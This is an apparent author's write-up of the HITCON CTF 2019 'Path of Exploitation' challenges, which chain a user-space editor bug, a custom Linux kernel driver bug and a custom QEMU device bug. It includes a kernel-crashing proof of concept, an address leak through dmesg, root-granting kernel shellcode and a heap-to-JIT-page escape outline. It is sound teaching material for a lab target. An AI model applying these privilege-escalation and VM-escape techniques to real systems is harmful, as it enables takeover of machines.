Wednesday, October 23, 2019

[Official Write-up] HITCON CTF Quals 2019 - Path of Exploitation

Path of Exploitation (PoE) is the series of pwn challenges I designed for this year's HITCON CTF qualification. It consists of three stages/layers: hackers have to exploit a user-space program, perform privilege escalation on Linux, and attack a custom device embedded in QEMU. Solve all three stages to become the master of pwn!

This challenge has a hierarchy similar to "Abyss", my series of challenges from HITCON CTF 2018. Abyss also contains three layers - the user-space program, the kernel, and the hypervisor - but with a self-implemented kernel and a hypervisor based on KVM.

For PoE, I modified the latest QEMU source code to add a custom device, the Treap Processing Unit (TPU), developed a Linux kernel module to drive my fancy device, and wrote a simple note editor in user-space that utilizes the TPU to perform string operations.
I have released all the source code and my exploit scripts for this challenge, along with the patches needed for the Linux kernel and QEMU.

Inspiration
All Linux kernel challenges in CTFs I have ever seen simply add a buggy kernel module and ask hackers to gain root privilege. I always feel this design just moves an easy-to-exploit bug from user-space into the Linux kernel and is not interesting at all (well, some kernel exploitations involve race conditions, but I hate race-condition bugs 😛). Therefore, I decided to design a series of challenges that includes a kernel driver communicating with "real" hardware.

Now the concept of three layers of exploitation was formed: exploit the kernel driver to gain root permission; before that, I can have a normal pwn challenge in user-space as usual; and with root privilege, one should be able to exploit the hardware simulator - QEMU in this case.

Now the question is, what kind of hardware should I implement? Any function can be implemented as hardware, but I needed to choose one that gives both the driver and the user-space program "something" to do. If the hardware does all the important things, the driver has nothing to do, and neither does the user-space program, which would make it hard for me to put vulnerabilities inside them.

Treap as hardware was my final choice. Treap is a powerful binary search tree that can perform sequence operations in O(logN) time, where N is the length of the sequence. AFAIK a Treap has almost the same abilities as a Splay Tree, but is much easier to understand and implement. With Treap as the device, I can have the driver implement a "data structure" (I named it "cord") that supports sequence operations. And the user-space program can create multiple "cords" (strings), as a normal text editor usually does.

The Names

TPU, a.k.a. Treap Processing Unit - inspired by the Google Tensor Processing Unit.

Cord the kernel driver - you must know there is a data structure in C++ named string, and you may know there is a powerful data structure named rope supported in libstdc++, which has all the member methods string has but implemented in O(logN) time. I'm not 100% sure what backend rope uses, but it's likely based on the Splay Tree I mentioned above. Then I searched for "synonyms of string and rope" and found cord to be a great choice.

Luna the user-space editor - well... I have to admit this name was chosen just because Luna sounds like a pretty and mysterious girl's name. Then I looked up the dictionary for words that could spell out LUNA, and the result is shown in the welcome message when opening luna - Legendary Ultra Note Accelerator.

And the overall name of these challenges, PoE, is inspired by the online game Path of Exile. The three stages, getting deeper and harder as you analyze them, feel like a path of exploitation.

PoE I - Luna
Now let's introduce the challenges. Luna, the first stage, is a classic menu-based program:
Luna is a note editor that supports basic operations like insertion and deletion, plus more interesting operations like replacement and reversal. All operations are performed on a range within a note; e.g., you can reverse range [3, 5] of a note whose length is 6 or greater with the command R 3 2. An important thing is that you can create a new tab and switch tabs to select which note to work on, through the commands n and s <N>.

Interact with /dev/cord
Though it's not related to exploiting Luna, I'll briefly explain how the user-space program interacts with cord here, which helps readers understand my design concept.

First of all, the program opens "/dev/cord" to acquire a cord_fd.
int cord_fd = open("/dev/cord", O_RDWR);
If you execute luna on a normal Linux distribution, you will find the program fails at this very step since there is, of course, no "/dev/cord". The file is registered by my kernel module, so you can't run luna except under the provided QEMU environment.

All further operations are performed via ioctl on the file descriptor cord_fd. For example, this snippet creates a new "cord" from the buffer text with length n:
int new_data(int n, char text[]) {
  struct cord_new_data cmd = {
    .n = n,
    .data = text,
  };
  return ioctl(cord_fd, CORD_NEW_DATA, &cmd);
}
The ioctl call with CORD_NEW_DATA returns a cid (Cord ID) on success, which can be used as an argument for further operations. You can find all the supported ioctl calls and cord's argument structures in linux/include/uapi/linux/cord.h.

Cache
Almost every operation shown in the menu is simply redirected to one or more ioctl calls in luna. However, there is a simple "cache" mechanism that aims to reduce the number of ioctl(CORD_DISPLAY) calls. When a new note is created, the text of the note is cached; if the note's length isn't changed by operations such as insertion or cut, the cached text is kept and can be used to display the content of the note without invoking ioctl(CORD_DISPLAY).
void display(u32 idx, u32 n) {
  struct Tab *tab = tabs[cur_tab];

  if (!tab->dirty) {
    write(1, tab->cache + idx, n);
    puts("");
    return;
  }
  // ... display using ioctl
}
And this additional cache mechanism is where the bug lies.

Buggy Luna
There's a README.md in the challenge attachment (you can find it here), and the first tip for Luna is:
Analyze the binary luna should be enough for solving this challenge.
I thought this challenge was pretty easy, since the tip is a big hint that you don't need to care about any ioctl calls in luna, and it's clear that only the cache mechanism can contain bugs.

Anyway, the bug is here:
void cut(u32 idx, u32 n) {
  // .. omit
  struct cord_cut cmd = {
    .cid = tab->cid,
    .cur = idx,
    .len = n
  };
  clip->cid = ioctl(cord_fd, CORD_CUT, &cmd);
  clip->len = n; // bug: should call clip->remove_cache() here
  tab->len -= n;
  tab->remove_cache();
}
If we partially cut a note, the cache of clip (a special note for cut/paste operations) is NOT updated. To fix the bug, just insert this line:
clip->remove_cache();
To leverage this bug, we first have clip cache something, then cut a note longer than the cached one; afterwards we have an OOB read via the display command and an OOB write via the replace command.

Using the OOB write, we can forge another note's cache and dirty fields, successfully converting the OOB read/write into an arbitrary read/write.

What remains is nothing special: use ROP to pop a shell and get the first flag:
PoE II - Cord
Now let's dig into the kernel driver. The target is to gain root privilege and read /flag2.
An important thing is to check the protections enabled in the kernel; see run.sh provided in the challenge attachment:
#!/bin/bash

./x86_64-softmmu/qemu-system-x86_64 \
  -kernel ./bzImage \
  -initrd ./initramfs.cpio.gz \
  -nographic \
  -monitor none \
  -cpu qemu64 \
  -append "console=ttyS0 kaslr panic=1" \
  -device tpu \
  -m 256M
I enabled kernel ASLR and reboot-on-panic. The good news for challengers is that I didn't enable SMAP (which could be done through -cpu qemu64,smap) because I wanted this challenge to be easier. SMAP is a CPU feature that prevents instructions in user-space from being executed in supervisor mode.
IIUC (not sure if this still works on the latest kernel), SMAP can be disabled if we can do ROP in kernel space, and my exploitation does use ROP in kernel space, but I didn't try the SMAP-disabling payload because I had already decided to make this challenge... easy.

The Cord
linux/drivers/misc/tpu/ contains all the source code of this kernel driver. I realize the reverse engineering is a little tough if one hasn't implemented a PCI device driver before. But well, as I mentioned in the Inspiration section, a kernel driver that doesn't communicate with hardware is just a toy.
This image shows the flow when an ioctl call occurs:

The identifier between user-space and the kernel driver is the Cord ID (cid), and the identifier between the kernel and TPU is the Treap ID (tid). There's a table named cid_map that maintains the mapping between cid and tid. Why do we need two kinds of IDs? Not because I wanted to make it complicated (I always want it to be easy); there's a reason. Imagine the user-space program holds a cid and, for example, does a cut operation on the cord. It's intuitive to the user that the cid still stands for the same string (with a range cut off). But from the kernel's view, the cut operation separates the sequence into two sequences, each with a new Treap ID (a Treap stands for a sequence). So instead of passing the frequently changing tid to user-space, the kernel only needs to update cid_map[cid] to the new Treap ID, and the user can happily keep using cid to represent the "same" sequence.

tpu-interp.c implements the functions for converting a high-level command to TPU instructions. Take the cut operation as an example:
// modified tpu-interp.c#tpu_cut
int tpu_cut(struct tpu_device *tdev, int tid, uint cur, uint len,
            int *out_tid1, int *out_tid2)
{
        /* omit the preparation */

        command_load(TPU_R0, tid); // R0 = Treap(tid)
        command_split(TPU_R0, cur, TPU_R0, TPU_R1); // Split R0 into R0 and R1
        command_split(TPU_R1, len, TPU_R1, TPU_R2); // Split R1 into R1 and R2
        command_merge(TPU_R0, TPU_R0, TPU_R2); // R0 = Merge R0 and R2
        command_info(TPU_R0); // query the tid of R0
        command_info(TPU_R1); // query the tid of R1

        /* omit the commitment */
}
TPU_R* are registers for the instructions between the kernel and TPU; you can treat them as pointers to a Treap structure (which is exactly how TPU implements them).
To cut the range starting at cur with length len from treap tid, first we need to split... well, it's a little hard to explain; let the image tell everything:

Combining the image with the code above, it should be easy to understand how the driver converts high-level commands to TPU instructions. You don't need to know (at least for this stage) what split and merge do; they are magic functions implemented in the hardware.

Queues
Another important part is that a command queue and a response queue are used for communication between the kernel and TPU. The TPU instructions generated in tpu-interp.c are put on the cmd queue, and the responses (if any) from the TPU are put on the rsp queue.

The concept of using queues for communication is inspired by SMMUv3. For some reason I read the SMMUv3 specification recently and found a lot of interesting designs in it. There is a command queue for the host to send commands to the SMMU, and an event queue for the SMMU to push errors onto when something goes wrong. The idea of using a wrap bit to distinguish whether a circular queue is full or empty also comes from SMMU (section 3.5.1, SMMU circular queues). I don't know whether these design tricks were "invented" by ARM or are common design patterns in hardware; I guess the latter.

Data Width
Before revealing where the bug is, the data-width mechanism in TPU needs to be introduced first.

In Luna, if you have analyzed the binary or checked the source luna.c, you'll find there is an ioctl call right after opening the device file:
ioctl(cord_fd, CORD_SET_DATA_WIDTH, 1);

The data width is the length of each element recorded on a treap node. In luna, each note is a string, and each "element" of a string is a one-byte character, so the data width used in luna is 1, as the argument passed to ioctl shows. But the "elements" of a string need not be characters: you can use integers with data width 4, or pointers with 8. This is inspired by the fact that std::string is a typedef of std::basic_string<char>; you can use std::basic_string<int> or std::basic_string<void*> to declare "strings" with 4-byte or 8-byte elements.

Buggy Cord
The bug was much harder for teams to find than I expected. According to IRC and the logs of the challenge service, only one team got "close" to where the bug was - but that was not enough to defeat my cord.

The bug is that the kernel driver records the data width in the wrong way. On TPU's side, the data width is a per-treap attribute - different treaps in TPU can have different widths - while on the driver's side, the width is a global attribute. The kernel should also record the width per treap, not globally. You might think this is just an implementation inconsistency between the kernel and TPU, and that one could never find this bug without analyzing both the driver and the patched QEMU. But I would say it can be found from the driver alone. I expected the bug to be "detected" by checking these two functions:
// tpu-cord.c
int tpu_cord_new_data(struct tpu_cord *cord, struct cord_new_data __user *argp)
{
        // .. omit
        tid = tpu_new_tree(cord->tdev, cmd.n, cord->data_width, d);
        // .. omit
}
int tpu_cord_display(struct tpu_cord *cord, struct cord_display __user *argp)
{
        // .. omit
        ret = tpu_display(cord->tdev, tid, cmd.cur, cmd.len, cord->data_width, data);
        // .. omit
}
When the kernel needs to create a new treap, cord->data_width is passed to TPU. And when the kernel wants to fetch the data recorded in a treap, cord->data_width is used again. So what happens if we change cord->data_width after creating a cord and before displaying it? Once this question comes to mind, it's not hard to find the answer - the response queue will be corrupted.

PoC
unsigned char data[24] = {
  0, 0, 0, // dummy
  TPU_OP_PRINT, 1, 0
};
set_width(8); // ioctl(cord_fd, CORD_SET_DATA_WIDTH, 8)
int cid = new_data(3, data);
set_width(1);
display(cid, 0, 3, data); // <--- the kernel thinks width=1 but TPU knows it's 8
new_data(1, data); // whatever you do here, the kernel will crash
When the kernel asks TPU to display cid, TPU puts all 3 * 8 = 24 bytes of data onto the response queue, while the kernel, which we have "cheated", fetches only 3 * 1 = 3 bytes from it. The remaining data on the response queue will be interpreted the next time the kernel tries to consume the queue. In the PoC, the fourth byte on the response queue is TPU_OP_PRINT, which leads to the PRINT handler being called and a null-pointer dereference being triggered:
// tpu-interp.c
static int tpu_print_handle(struct tpu_device *tdev, void *arg_)
{
        struct tpu_print_args *arg = arg_; // <-- this is null
        uint sz = 0;

        if (!fetch_rsp(tdev, 1, (u8 *)&sz))
                return -EBADMSG;
        if (!fetch_rsp(tdev, sz * arg->width, arg->data)) // panic
                return -EBADMSG;
        return 0;
}
In a normal situation, arg would be well prepared and of course no error occurs. But once I put the "fake" TPU_OP_PRINT on the queue, this handler is called without a proper arg and crashes the kernel.

Exploitation
Finally, we can start our favorite part.
First of all, we need to know how powerful we are when the content of the response queue is fully controlled. There are only three kinds of handlers that might be called: TPU_OP_VERSION, TPU_OP_INFO, and TPU_OP_PRINT.
// tpu-interp.c
/* fetch op and call the handler */
int tpu_rsp_handle(struct tpu_device *tdev, void *arg)
{
        enum TPU_OP op = TPU_OP_END;

        if (!fetch_rsp(tdev, 1, (u8 *)&op))
                return -EBADMSG;
        switch (op) {
        case TPU_OP_VERSION:
                return tpu_hw_version_handle(tdev);
        case TPU_OP_PRINT:
                return tpu_print_handle(tdev, arg);
        case TPU_OP_INFO:
                return tpu_info_handle(tdev);
        default:
                return -EBADMSG;
        };
}
VERSION is a dumb thing; just ignore it. INFO is used for returning the Treap ID (tid) to the driver, so we can cheat the kernel into using whatever tid values we want, and this is useful.
See this function, which handles a cut operation:
// tpu-cord.c
static int tpu_cord_cut(struct tpu_cord *cord, struct cord_cut __user *argp)
{
        // .. omit
        ret = tpu_cut(cord->tdev, tid, cmd.cur, cmd.len, &tid, &tid2);
        if (WARN_ON(ret < 0)) // should never happen.. unless the rsp queue is corrupted
                goto out;
        // .. omit
out:
        tpu_cord_set_map(cord, cmd.cid, 0, 0);
        return ret;
}
Notice the WARN_ON: if tpu_cut returns a negative errno, WARN_ON dumps the stack trace and all register values to dmesg. It looks like this:
The dump contains a lot of kernel addresses, and the most important thing is, it's just a WARNING, not a PANIC - the kernel keeps executing as if nothing wrong happened!
So we can use this to leak kernel addresses without corrupting any kernel memory. This is how I use WARN_ON to leak the stack address:
// sol/cord_exp.c#leak
cut(cid, 2, 1); // trigger WARN_ON
system("dmesg | grep 'RSP: 0018:' > /home/poe/z");
FILE *f = fopen("/home/poe/z", "r");
fscanf(f, "[ %f] RSP: 0018:%llx", &dummy, &k_stack);
printf("kernel stack @ %#llx\n", k_stack);

Leaking kernel addresses is all we can do with the handler of INFO, now let's move to the one of PRINT:
// tpu-interp.c
static int tpu_print_handle(struct tpu_device *tdev, void *arg_)
{
        struct tpu_print_args *arg = arg_;
        uint sz = 0;

        if (!fetch_rsp(tdev, 1, (u8 *)&sz)) // sz comes from the queue!
                return -EBADMSG;
        if (!fetch_rsp(tdev, sz * arg->width, arg->data))
                return -EBADMSG;
        return 0;
}
How much data is written into arg->data is decided by sz, which is read from the response queue(!). So obviously we have a kernel heap overflow here.

With addresses leaked and a nice heap overflow, nothing can stop us hackers. The way I control rip is by using the heap overflow to overwrite the arg of PRINT:
// tpu-interp.c
static int tpu_print_handle(struct tpu_device *tdev, void *arg_)           
        // ^--- control this value
{
        struct tpu_print_args *arg = arg_;
        uint sz = 0;

        if (!fetch_rsp(tdev, 1, (u8 *)&sz))
                return -EBADMSG;
        if (!fetch_rsp(tdev, sz * arg->width, arg->data)) // then we have the world
                return -EBADMSG;
        return 0;
}
By carefully controlling arg's width and data, we get an arbitrary write in the kernel. In my solution, I simply write 8 bytes over a return address on the kernel stack and return to shellcode prepared in user-space - it can't be easier.

This is the shellcode I prepared:
sc = asm(<<-EOS)
  push rax /* store regs */
  push rbp
  mov rax, 0x5ac8
  mov rbp, QWORD PTR gs:[rax]
  and rbp, 0xfffffffffff00000
  mov rdx, rbp
  add rdx, 0xb6080 /* prepare_kernel_cred */
  xor rdi, rdi
  call rdx
  mov rdi, rax
  mov rdx, rbp
  add rdx, 0xb5da0 /* commit_creds */
  call rdx
  pop rbp
  pop rax
  mov rdx, QWORD PTR [rsp + 0x40]
  and rdx, 0xfffffffffff00000
  add rdx, 0xb7389 /* org ret */
  push rdx
  ret
EOS
It first leaks the kernel code base address through the gs register, calls our friends commit_creds(prepare_kernel_cred(0)), and fixes up the original return address so we can return from the system call as if nothing weird had happened - but with root permission.

My exploit script has roughly a 25% success rate because the heap layout is not stable. I overflow 0x500 bytes and hope the target structure (the handler's arg) is near enough to be overwritten. It's possible to overflow more bytes to raise the rate, but this is good enough for me.

PoE III - TPU
Finally we come to the last stage and, unfortunately, this is the hardest (in my opinion) challenge in the series.

First of all, to exploit TPU you need to learn how a Treap works; checking the Wiki page might be enough. The most important parts are merge and split (named union on the Wiki page); here's my implementation:
// qemu/hw/misc/tpu.c
static Node *merge(Node *a, Node *b) {
        if (a == NULL) return b;
        if (b == NULL) return a;
        if (a->hval >= b->hval) {
                push(a);
                a->r = merge(a->r, b);
                pull(a);
                return a;
        }
        else {
                push(b);
                b->l = merge(a, b->l);
                pull(b);
                return b;
        }
}

static void split(Node *now, uint32_t x, Node **a, Node **b) {
        int lsz;

        if (x == 0) {
                *a = NULL;
                *b = now;
                return;
        }
        if (now == NULL || now->sz == x) {
                *a = now;
                *b = NULL;
                return;
        }

        push(now);

        if (now->l) lsz = now->l->sz;
        else lsz = 0;

        if(lsz + 1 <= x) {
                *a = now;
                split(now->r, x - lsz - 1, &((*a)->r), b);
        }
        else {
                *b = now;
                split(now->l, x, a, &((*b)->l));
        }
        pull(now);
}

Bug
Oh, this fast? Nothing to introduce first? Well, there are some interesting things that could be mentioned, such as the timing of malloc/free (yep, we are going to do heap exploitation), but we don't need any of them to describe the bug.

The bug occurs when the device handles the MERGE command coming from the kernel:
static void handle_cmd_merge(TPUState *tpu, cmd_type inst)
{
        uint8_t d, s1, s2;

        // omit some checks
        if (null_or_root(tpu->reg[s1]) && null_or_root(tpu->reg[s2])) {
                unset_tid(tpu->reg[s1]);
                unset_tid(tpu->reg[s2]);
                tpu->reg[d] = merge(tpu->reg[s1], tpu->reg[s2]);
                set_tid(tpu->reg[d]);
        }
        else {
                tpu->reg[d] = NULL;
        }
}
set_tid and unset_tid are used for marking whether a Node* is the root of a treap; they are fine, bug-free. The bug is here: merge(tpu->reg[s1], tpu->reg[s2]). merge merges two treaps into one. So, what happens if we merge a treap with itself? The answer is, we obtain a treap whose root's right child is itself.


Brainstorming
I have to say this bug is beautiful because - it's not intended. Actually, I didn't plant any intended bug when I wrote the code. I found this bug during my self code auditing, and at first I thought it was unexploitable. If we print the "loop-ed" treap, it definitely causes infinite recursion and crashes QEMU (we have no interest in DoS bugs). And if we do other operations, such as splitting the treap, it goes back to being a normal treap.

Then I kept thinking about whether other operations would have fun effects on a loop-ed treap, and realized I already knew one - merge.
To make this easier to describe, every "loop-ed treap" below stands for a treap with only one node, whose left child points to null and whose right child points to itself.
Say we have a loop-ed treap A. We can't merge it with itself again, otherwise infinite recursion would happen. But we can merge it with another loop-ed treap B. And the most interesting part is the size attribute of these treaps.

Let's make it more general. Say we have a loop-ed treap A with size a and a loop-ed treap B with size b, where B's heap value is larger than A's. Then do the following operations:
  1. merge(A, B) => size(A) = a; size(B) = a + b + 1
  2. split(B, a) => size(A) = a; size(B) = a + b + 2
So two operations make loop-ed treap B's size grow by a + 2. And if we then let B merge with another loop-ed treap C, we can make C's size grow by a + b + 4. You may have already noticed that we can make the sizes of loop-ed treaps grow exponentially, and eventually we get an integer overflow on the size attribute.

In my solution, sol/tpu_exp.c#construct_3 constructs a loop-ed treap with size equal to -3. I need such a treap because when we use it as A and merge it with another loop-ed treap B, B's size changes from b to b - 3 + 2 = b - 1. So we can create loop-ed treaps with arbitrary negative sizes based on the "-3" treap.

Exploitation
So what's the benefit of having a treap with a negative size? An obvious way to leverage it is to make the size of the buffer allocated for printing the treap wrong:
// src/qemu/hw/misc/tpu.c
static void handle_cmd_print(TPUState *tpu, cmd_type inst)
{
        Node *n = tpu->reg[(inst >> 4) & (TPU_REG_END - 1)];
        uint8_t op = TPU_OP_PRINT;
        int sz;
        void *data;

        push_rsp(tpu, &op, 1);
        if (!is_root(n) || n->sz > MAX_CMD_N) {
                // .. omit
        }
        else {
                data = g_malloc(n->sz * n->w); // n->sz can be any value we want
                sz = 0;
                print_tree(n, data, &sz);
                push_rsp(tpu, (uint8_t *)&n->sz, 1);
                push_rsp(tpu, data, n->sz * n->w);
                g_free(data);
        }
}
However, we still cannot print a loop-ed treap because it's... loop-ed. When you try to traverse a loop-ed treap, you fall into the infinite loop and crash eventually. But there's a way to overcome this - the heap overflow. If the buffer for printing is located right before the Node structure of the loop-ed node on the heap, then the heap overflow during printing overwrites the right child of that loop-ed node, and therefore breaks the loop. This is the key point of my exploitation, which successfully converts a DoS vulnerability into a heap exploitation.


Since we don't have any leaked addresses, a good approach is to overwrite only the low bytes of the right-child pointer, turning the loop-ed treap into a normal treap whose right child points to a fake node we prepared. Let the fake node overlap with another node structure, and we can leak a heap address. BTW, the heap we are working on is a per-thread heap, since the TPU device works in a separate thread.

The good news is that QEMU has JIT pages, which form an rwx segment. Even better, on the Ubuntu 18.04 machine, the JIT page is 0x20000000 bytes away from our heap address. The distance between the JIT page and our heap is not always 0x20000000, but I found it highly likely to be. I guess the instability is related to the order of the mmap calls invoked by QEMU's threads.

After leaking the heap address, I forged a tcache entry to make the next malloc-ed chunk land in the JIT page, and boom! Overwrite the content of the JIT page with shellcode to cat the flag.
There are some details to be careful about when exploiting, such as how to forge a fake node without crashing the program and how to prevent threads from crashing before the JIT code is executed, but I won't explain them here since that would be too tedious.

The screenshot when my exploit script succeeded:

Fun Facts
I always like to share some fun facts after designing a challenge:
  1. My expected numbers of teams to solve PoE I, II, and III were 80, 10, and 2, respectively. The actual result was 20, 0, and 0, with error rates of 300% and ∞.
    • I have to say I'm pretty sad that no team could even reach the final stage; maybe it's because the driver does so many things that it's hard to figure out where the bug is.
  2. One team had a pretty close solution for PoE II during the competition. They were trying to use a race condition to change the data width before the IRQ handler is called.
    • How I wish I could have told them to just remove the term "race condition" from their brains and everything would have worked fine. I think the method they tried cannot succeed unless there are bugs in the driver that I don't know about (which is surely possible).
  3. According to my commit history, this challenge took me a month to design, develop, and exploit. I learned a lot from developing programs at different layers (user-space, the kernel, and QEMU). Maybe this challenge could be turned into a demo of how to implement your own QEMU device plus kernel driver? Please encourage me to do so if you think it's a good idea.
Conclusion
The path of exploitation is too long to have a brief conclusion :p
I wish you learned something from my challenge(s). Please DM @david942j on Twitter or leave a comment here if you have any thoughts you'd like to share with me 😀

4 comments:

  1. Is there any good tutorials on writing linux kernel module that you would recommend? I started doing some simple character device driver but it's hard to find detailed and up to date documentations on it.

    1. Nope, I don't know of a nice tutorial for this. I only reviewed some drivers in the Linux upstream and the official documentation.

  2. How do you debug the luna binary? The QEMU image didn't contain any debugging tools or Python scripts. I tried uploading a standalone gdb but it was not executable. I also tried loading the kernel module on my host Linux to register /dev/cord, but that didn't work either.

    1. Pass the argument "-gdb tcp::1234" to QEMU, then you can attach GDB with "target remote localhost:1234" at the GDB prompt; this is the normal way to debug a kernel running in QEMU.
      Adding a statically-linked GDB to the filesystem should work, but I didn't try it.
      Executing insmod tpu.ko on your host didn't work because the kernel module couldn't find my fancy hardware, the TPU, which is only added in the QEMU I provided.
